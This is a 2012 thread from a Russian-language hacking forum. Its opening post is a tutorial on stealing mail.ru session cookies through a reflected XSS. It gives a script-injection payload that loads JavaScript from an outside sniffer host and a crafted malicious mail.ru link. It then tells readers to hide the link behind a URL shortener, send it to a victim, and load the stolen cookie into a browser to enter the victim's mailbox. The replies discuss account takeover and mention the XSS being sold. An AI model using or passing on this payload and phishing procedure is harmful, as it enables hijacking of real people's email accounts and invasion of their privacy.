ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

01.02.2012, 15:22
|
|
Guest
Сообщений: n/a
Провел на форуме: 2136
Репутация:
-10
|
|
Привет всем я хотел рассказать как можна угнать куки на mail.ru с помощью пассивной xss.
1.Нам понадобиться Пассивка
2.Сниффер я буду использовать сниффер https://hacker-pro.net/sniffer/
3.Мозги и руки !
Так заходим на сниффер и берём Код для пассивной XSS атаки вот он
Код:
Code:
%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js>"
мы теперь должи прекрепить его к пассивной xss после знака "> и у нас получется вот так
Код:
Code:
http://mail.ru/###********=">%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js>"
Если жертва перейдёт по этой ссылке то куки придут на наш сниффер.
Но это ещё не всё ссылка слишком подазрительная мы должны её зашифровать я буду использовать сервис http://tinyurl.com/
заходим на этот сайт и где написано
Код:
Code:
Enter a long URL to make tiny:
вбиваем туда нашу ядовитую ссылку и нажимаем на кнопочку
Код:
Code:
make a TinyURL
И у нас появится ссылка http://tinyurl.com/823p5w9 ну увас может быть чучуть другая ну это не важно кидаем эту ссылку жертве и если она перейдёт по этой ссылке то её куки будут у нас.
Как заменить cokies ? настройки\общие настройки\расширения\cokies и найти там маил.ру cokies там будет такая вкладка mpop нажимаешь на неё и в вкладке значение вбиваешь cokies жертвы.
Внимание если жертва перейдёт по ссылки и выйдет из своего мыла то куки автоматически умерают.
ну чтож думаю всё !
не забываем про "+"
Автор : Tickhack
|
|
|
|

01.02.2012, 15:54
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме: 4512
Репутация:
0
|
|
tickhack, допустим, ты получил через XSS куки mail.ru. Как с помощью них взломать мыло?
Сообщение от tickhack
tickhack said:
Как заменить cokies ? настройки\общие настройки\расширения\cokies и найти там маил.ру cokies там будет такая вкладка mpop нажимаешь на неё и в вкладке значение вбиваешь cokies жертвы.
После этого что делать?
|
|
|

01.02.2012, 16:37
|
|
Новичок
Регистрация: 29.01.2010
Сообщений: 0
Провел на форуме: 73182
Репутация:
0
|
|
M_script после этого ты попадаешь в мыло жертвы если куки еще действительны будут!)))
|
|
|

01.02.2012, 16:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 2136
Репутация:
-10
|
|
Сообщение от M_script
M_script said:
tickhack
, допустим, ты получил через XSS куки mail.ru. Как с помощью них взломать мыло?
После этого что делать?
после этого заходишь на майл.ру и попадаешь на мыло жертвы
только не забудь заменить куки жертвы на свои в опере
|
|
|
|

01.02.2012, 17:15
|
|
Guest
Сообщений: n/a
Провел на форуме: 45485
Репутация:
1
|
|
Сообщение от tickhack
tickhack said:
после этого заходишь на майл.ру и попадаешь на мыло жертвы
только не забудь заменить куки жертвы на свои в опере
Хе-хе. Тут в паблик выложил пассивную XSS, в другой теме продавал ее минут 30 назад за 25$. Мужик)
|
|
|
|

01.02.2012, 17:31
|
|
Guest
Сообщений: n/a
Провел на форуме: 2136
Репутация:
-10
|
|
Сообщение от kravch_v
kravch_v said:
Хе-хе. Тут в паблик выложил пассивную XSS, в другой теме продавал ее минут 30 назад за 25$. Мужик)
Не жалко у меня их много
|
|
|
|

01.02.2012, 17:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 2136
Репутация:
-10
|
|
Сообщение от kravch_v
kravch_v said:
Хе-хе. Тут в паблик выложил пассивную XSS, в другой теме продавал ее минут 30 назад за 25$. Мужик)
уже нету пассивки
|
|
|
|

01.02.2012, 17:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 23035
Репутация:
5
|
|
Сообщение от M_script
M_script said:
tickhack
, допустим, ты получил через XSS куки mail.ru. Как с помощью них взломать мыло?
После этого что делать?
Потроллить решил?
|
|
|
|

01.02.2012, 18:12
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме: 4512
Репутация:
0
|
|
martmm, tickhack, вы неправильно поняли вопрос.
Взлом подразумевает получение полного контроля над ящиком. Как изменить пароль или данные для его восстановления, имея только куки юзера?
|
|
|

01.02.2012, 18:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
Сообщение от M_script
M_script said:
martmm
,
tickhack
, вы не правильно поняли вопрос.
Взлом подразумевает получение полного контроля над ящиком. Как изменить пароль или данные для его восстановления, имея только куки юзера?
Ну если я не отстал от жизни, то думаю никак. Разве мегабаг найдут. Видел пару тем, в которых предлагают купить:
Сообщение от None
Смена пароля в сессии
Как это делают, хз.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|